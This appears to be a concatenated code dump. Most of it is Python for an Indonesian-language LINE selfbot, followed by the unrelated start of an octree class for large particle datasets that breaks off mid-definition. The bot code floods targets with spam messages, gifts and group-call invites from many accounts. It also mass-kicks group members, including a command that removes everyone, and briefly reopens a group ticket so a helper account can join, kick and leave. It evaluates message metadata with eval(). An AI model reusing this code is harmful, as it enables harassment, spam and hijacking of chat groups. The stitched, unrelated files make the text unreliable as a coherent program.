jmlh = int(wait["limit"])
cl.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
if jmlh <= 1000:
for x in range(jmlh):
try:
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi batas")
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kk.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kc.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, str(Setmain["ARmessage1"]))
ki.sendMessage(midd, str(Setmain["ARmessage1"]))
kk.sendMessage(midd, str(Setmain["ARmessage1"]))
kc.sendMessage(midd, str(Setmain["ARmessage1"]))
km.sendMessage(midd, str(Setmain["ARmessage1"]))
kb.sendMessage(midd, str(Setmain["ARmessage1"]))
kn.sendMessage(midd, str(Setmain["ARmessage1"]))
ko.sendMessage(midd, str(Setmain["ARmessage1"]))
cw.sendMessage(midd, str(Setmain["ARmessage1"]))
ke.sendMessage(midd, str(Setmain["ARmessage1"]))
ky.sendMessage(midd, str(Setmain["ARmessage1"]))
elif 'ID line: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
msgs = msg.text.replace('ID line: ','')
conn = cl.findContactsByUserid(msgs)
if True:
cl.sendMessage(msg.to, "http://line.me/ti/p/~" + msgs)
cl.sendMessage(msg.to, None, contentMetadata={'mid': conn.mid}, contentType=13)
#===========Protection============#
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protectinvite ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectinvite ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "Protect invite sudah aktif"
else:
protectinvite.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect invite diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
protectinvite.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect invite dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect invite sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Antijs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Antijs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "Anti JS sudah aktif"
else:
protectantijs.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
protectantijs.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Anti JS Sudah Tidak Aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "Ghost sudah aktif"
else:
ghost.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
ghost.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Ghost Sudah Tidak Aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Allpro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Allpro ','')
if spl == 'on':
#if wait["allprotect"] == True:
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectinvite:
msgs = ""
else:
protectinvite.append(msg.to)
if msg.to in protectantijs:
msgs = ""
else:
protectantijs.append(msg.to)
if msg.to in ghost:
msgs = ""
else:
ghost.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua sudah diaktifkan"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection diaktifkan"
cl.sendMessage(msg.to, "ã Status Protection ã\n" + msgs)
elif spl == 'off':
#if wait["allprotect"] == False:
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectinvite:
protectinvite.remove(msg.to)
else:
msgs = ""
if msg.to in protectantijs:
protectantijs.remove(msg.to)
else:
msgs = ""
if msg.to in ghost:
ghost.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection dimatikan"
else:
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection dimatikan"
cl.sendMessage(msg.to, "ã Status Protection ã\n" + msgs)
#===========KICKOUT============#
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sw.kickoutFromGroup(msg.to, [target])
sw.leaveGroup(msg.to)
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
elif ("Kick1 " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
elif ("Bangsat" in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = [contact.mid for contact in group.members]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [targets])
except:
pass
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
admin.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
staff.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Dpk:
try:
Bots.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "admin:repeat" or text.lower() == 'admin:repeat':
if msg._from in admin:
wait["delladmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:repeat" or text.lower() == 'staff:repeat':
if msg._from in admin:
wait["dellstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:repeat" or text.lower() == 'bot:repeat':
if msg._from in admin:
wait["dellbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
cl.sendText(msg.to,"Berhasil di Refresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
if msg._from in admin:
ma = ""
for i in admin:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
if msg._from in admin:
ma = ""
for i in staff:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
if msg._from in admin:
ma = ""
for i in Bots:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========COMMAND ON OFF============#
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
cl.sendText(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["MentionKick"] = False
cl.sendText(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
cl.sendText(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
cl.sendText(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto respon dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
cl.sendText(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
cl.sendText(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
cl.sendText(msg.to,"Autoleave diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
cl.sendText(msg.to,"Autoleave dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "read on" or text.lower() == 'autoread on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "read off" or text.lower() == 'autoread off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
cl.sendText(msg.to,"Deteksi sticker diaktifkan")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
cl.sendText(msg.to,"Deteksi sticker dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = True
cl.sendText(msg.to,"Join ticket diaktifkan")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = False
cl.sendText(msg.to,"Autojoin Tiket dinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"Famz__Botz Blacklist User\n\n"+ma+"\nTotalã%sãBlacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"Famz__Botz Talkban User\n\n"+ma+"\nTotalã%sãTalkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = cl.getContacts(wait["blacklist"])
mc = "ã%iãUser Blacklist" % len(ragets)
cl.sendMessage(msg.to,"Sukses membersihkan " +mc)
#===========COMMAND SET============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Pesan Msg")
else:
wait["message"] = spl
cl.sendMessage(msg.to, "ãPesan Msgã\nPesan Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
cl.sendMessage(msg.to, "ãWelcome Msgã\nWelcome Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
cl.sendMessage(msg.to, "ãRespon Msgã\nRespon Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["ARmessage1"] = spl
cl.sendMessage(msg.to, "ãSpam Msgã\nSpam Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
cl.sendMessage(msg.to, "ãSider Msgã\nSider Msg diganti jadi :\n\nã{}ã".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
cl.sendMessage(msg.to, "ãPesan Msgã\nPesan Msg mu :\n\nã " + str(wait["message"]) + " ã")
elif text.lower() == "cek welcome":
if msg._from in admin:
cl.sendMessage(msg.to, "ãWelcome Msgã\nWelcome Msg mu :\n\nã " + str(wait["welcome"]) + " ã")
elif text.lower() == "cek respon":
if msg._from in admin:
cl.sendMessage(msg.to, "ãRespon Msgã\nRespon Msg mu :\n\nã " + str(wait["Respontag"]) + " ã")
elif text.lower() == "cek spam":
if msg._from in admin:
cl.sendMessage(msg.to, "ãSpam Msgã\nSpam Msg mu :\n\nã " + str(Setmain["ARmessage1"]) + " ã")
elif text.lower() == "cek sider":
if msg._from in admin:
cl.sendMessage(msg.to, "ãSider Msgã\nSider Msg mu :\n\nã " + str(wait["mention"]) + " ã")
#===========JOIN TICKET============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group2 = kk.findGroupByTicket(ticket_id)
kk.acceptGroupInvitationByTicket(group2.id,ticket_id)
kk.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group3 = kc.findGroupByTicket(ticket_id)
kc.acceptGroupInvitationByTicket(group3.id,ticket_id)
kc.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group4 = km.findGroupByTicket(ticket_id)
km.acceptGroupInvitationByTicket(group.id,ticket_id)
km.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group5 = kb.findGroupByTicket(ticket_id)
kb.acceptGroupInvitationByTicket(group1.id,ticket_id)
kb.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group6 = kn.findGroupByTicket(ticket_id)
kn.acceptGroupInvitationByTicket(group2.id,ticket_id)
kn.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group7 = ko.findGroupByTicket(ticket_id)
ko.acceptGroupInvitationByTicket(group3.id,ticket_id)
ko.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group8 = kw.findGroupByTicket(ticket_id)
kw.acceptGroupInvitationByTicket(group.id,ticket_id)
kw.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group9 = ke.findGroupByTicket(ticket_id)
ke.acceptGroupInvitationByTicket(group1.id,ticket_id)
ke.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group10 = ky.findGroupByTicket(ticket_id)
ky.acceptGroupInvitationByTicket(group2.id,ticket_id)
ky.sendMessage(msg.to, "Masuk : %s" % str(group.name))
except Exception as error:
print (error)
while True:
try:
ops = poll.singleTrace(count=50)
if ops is not None:
for op in ops:
poll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
thread1.start()
thread1.join()
except Exception as e:
pass
|
octreeStreamMultiprocessing.py
|
''' Attempting to write an octree in python
I want this to work with VERY large data sets that can't be stored fully in memory. So my procedure will be as follows:
- need to read in line-by-line and clear memory every X MB (or maybe every X particles;can I check memory load in python?)
- go down to nodes with containing N particles
- need to write out tree with node sizes and centers and also ending nodes with actual particles
'''
import os
import numpy as np
import json
import h5py
import random
from multiprocessing import Process, Manager
#https://stackoverflow.com/questions/56250514/how-to-tackle-with-error-object-of-type-int32-is-not-json-serializable
#to help with dumping to json
class npEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.int32):
return int(obj)
return json.JSONEncoder.default(self, obj)
class octreeStream:
def __init__(self, inputFile, NMemoryMax = 1e5, NNodeMax = 5000,
header = 0, delim = None, colIndices = {'Coordinates':[0,1,2]},
baseDir = 'octreeNodes', Nmax=np.inf, verbose=0, path = None, minWidth=0,
h5PartKey = '', keyList = ['Coordinates'], center = None, cleanDir = False,
Ncores=1):
'''
inputFile : path to the file. For now only text files.
NMemoryMax : the maximum number of particles to save in the memory before writing to a file
NNodeMax : the maximum number of particles to store in a node before splitting it
header : the line number of the header (file starts at line 1,
set header=0 for no header, and in that case x,y,z are assumed to be the first three columns)
delim : the delimiter between columns, if set to None, then hdf5 file is assumed
colIndices : dict with the column numbers for each value in keyList (only necessary for csv files)
baseDir : the directory to store the octree files
Nmax : maximum number of particles to include
verbose : controls how much output to write to the console
path : the path to the output file
minWidth : the minimum width that a node can have
h5PartKey : if needed, can be used to specify which particle type to use, e.g. 'PartType0'
keyList : Any additional keys that are desired; MUST contain the key to Coordinates first. If blank, then assume that x,y,z is the first 3 columns in file
center : options for the user to provide the octree center (can save time)
cleanDir : if true this will erase the files within that directory before beginning
Ncores : number of cores for multiprocessing
'''
self.nodes = Manager().list() #will contain a list of all nodes with each as a dict
self.managerDict = Manager().dict()
self.managerDict['inputFile'] = inputFile
self.managerDict['NMemoryMax'] = NMemoryMax
self.managerDict['NNodeMax'] = NNodeMax
self.managerDict['header'] = header
self.managerDict['delim'] = delim
self.managerDict['colIndices'] = colIndices
self.managerDict['minWidth'] = minWidth
self.managerDict['h5PartKey'] = h5PartKey
self.managerDict['keyList'] = keyList
self.managerDict['center'] = center
self.managerDict['Nmax'] = Nmax
self.managerDict['cleanDir'] = cleanDir
self.managerDict['Ncores'] = Ncores
self.managerDict['verbose'] = verbose
if (path is None):
self.managerDict['path'] = os.path.join(os.getcwd(), baseDir)
else:
self.managerDict['path'] = os.path.abspath(path) #to make this windows safe
print('files will be output to:', self.managerDict['path'])
self.managerDict['count'] = 0
self.managerDict['lineN'] = 0
self.managerDict['arr'] = None #will contain the data from the file
self.managerDict['width'] = None #will be determined in getSizeCenter
def createNode(self, center, id='', width=0,):
